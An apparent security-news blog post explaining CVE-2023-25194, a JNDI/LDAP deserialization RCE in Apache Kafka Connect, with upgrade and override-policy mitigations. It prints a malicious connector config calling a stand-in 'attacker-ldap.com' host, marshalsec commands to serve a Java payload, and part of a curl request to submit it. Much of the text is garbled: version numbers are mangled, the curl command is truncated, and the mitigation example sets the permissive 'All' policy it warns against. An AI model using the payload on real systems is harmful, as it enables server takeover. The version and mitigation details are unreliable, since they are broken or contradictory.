CVE CyberSecurity Database News

CVE-2023-25194 - Remote Code Execution Vulnerability in Apache Kafka Connect Explained

Poster -

A critical security vulnerability has been discovered in Apache Kafka Connect, tracked as CVE-2023-25194. This flaw allows attackers with access to the Kafka Connect REST API to achieve Remote Code Execution (RCE) on backend servers via malicious JAAS configuration and a crafted LDAP server. This vulnerability is present in default Apache Kafka Connect installations since version 3.. and can be deadly if not properly mitigated.

This post will break down what the vulnerability is, how an attacker could use it, show proof-of-concept code, and give exclusive advice on how to secure your Kafka Connect clusters.

Background: What Is Apache Kafka Connect?

Apache Kafka Connect is a tool used for connecting Kafka with external systems like databases or key-value stores. Kafka Connect uses connectors and exposes them through a REST API, making configuration and management easy—but that flexibility also brings risk.

Where's the Problem?

Since Kafka 2.3., users who can access the Kafka Connect REST API can set certain configuration fields for connectors. Critical among these is the sasl.jaas.config property, which defines authentication providers.

The bug:
If an attacker sets this property with the value com.sun.security.auth.module.JndiLoginModule, Kafka Connect will connect to an attacker-controlled LDAP server and deserialize anything the attacker sends—leading to Remote Code Execution.

admin.override.sasl.jaas.config

Attackers can submit a connector configuration with any of the fields above targeting JNDI.

Example Vulnerable Configuration

{
  "name": "evil-connector",
  "config": {
    "connector.class": "MyCustomConnector",
    "tasks.max": "1",
    "producer.override.sasl.mechanism": "PLAIN",
    "producer.override.security.protocol": "SASL_PLAINTEXT",
    "producer.override.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://attacker-ldap.com:1389/Exploit\" useFirstPass=true;"
  }
}

This instructs Kafka Connect to connect to attacker-ldap.com:1389 via JNDI and deserialize the LDAP response.

Spin up a Malicious LDAP Server:

Use marshalsec (a tool for exploiting JNDI lookups) to create a server that serves up a Java deserialization payload.

`bash

git clone https://github.com/mbechler/marshalsec.git

mvn clean package -DskipTests

java -cp target/marshalsec-*-all.jar marshalsec.jndi.LDAPRefServer "http://your-server/payload"

`bash

curl -X POST http://kafka-connect-server:8083/connectors \
-H "Content-Type: application/json" \

RCE Gained:

Once deserialized, whatever code was served by the attacker's LDAP server gets executed on the Kafka Connect server's JVM.

Technical Root Cause

This is a classic Java deserialization attack over JNDI. When Kafka Connect processes the connector config, the following happens:

It loads the sasl.jaas.config string.

- If it contains JndiLoginModule, Kafka Connect tries to authenticate using JNDI and connects to the attacker-controlled LDAP server specified in user.provider.url.

RCE (Remote Code Execution): An attacker can run arbitrary code on your server.

- Full Cluster Takeover: Once in, attackers can move laterally, steal secrets, or pivot to other systems.

Vulnerable: Apache Kafka Connect 3.. – 3.3.x (out-of-box, unless configured otherwise)

- Potentially Vulnerable: Kafka Connect 2.3. – 2.8.x (if an insecure "client override policy" is in use)

1. Upgrade Kafka Connect to 3.4. or Higher

- Version 3.4. adds the -Dorg.apache.kafka.disallowed.login.modules system property, which, by default, disables com.sun.security.auth.module.JndiLoginModule.

# Example starting Kafka Connect with the mitigation property
export KAFKA_OPTS="-Dorg.apache.kafka.disallowed.login.modules=com.sun.security.auth.module.JndiLoginModule"
./bin/connect-distributed.sh config/connect-distributed.properties

- Release notes / docs

2. Restrict Client Overrides

Implement a connector client override policy to prevent dangerous properties from being overridden via connector configurations. This further blocks attackers, even if the REST API is exposed.

Example (in connect-distributed.properties)

connector.client.config.override.policy=All
# use "None" or create a custom policy to restrict specific keys

3. Validate Connector Configurations

- Allow only trusted admins to create/modify connectors.

References

- Apache Kafka CVE-2023-25194 Security Advisory
- Apache Kafka Pull Request addressing the issue
- JNDI Injection Explained by Bishop Fox
- Marshalsec -- Tool for JNDI Exploitation
- Kafka Connect Documentation

Conclusion

CVE-2023-25194 shows how powerful and dangerous connector configuration can be in Apache Kafka Connect. By taking advantage of JAAS settings and JNDI, attackers with simple API access can gain total control of your backend servers.

> If your Kafka Connect cluster is not patched, now is the time.
> Upgrade, restrict overrides, and always validate connector settings.

Stay safe and keep your data moving—securely!

*This security write-up is exclusive and tailored for clarity. If you found it useful, share it and help secure more Kafka installations!*

Timeline

Published on: 02/07/2023 20:15:00 UTC
Last modified on: 02/16/2023 16:44:00 UTC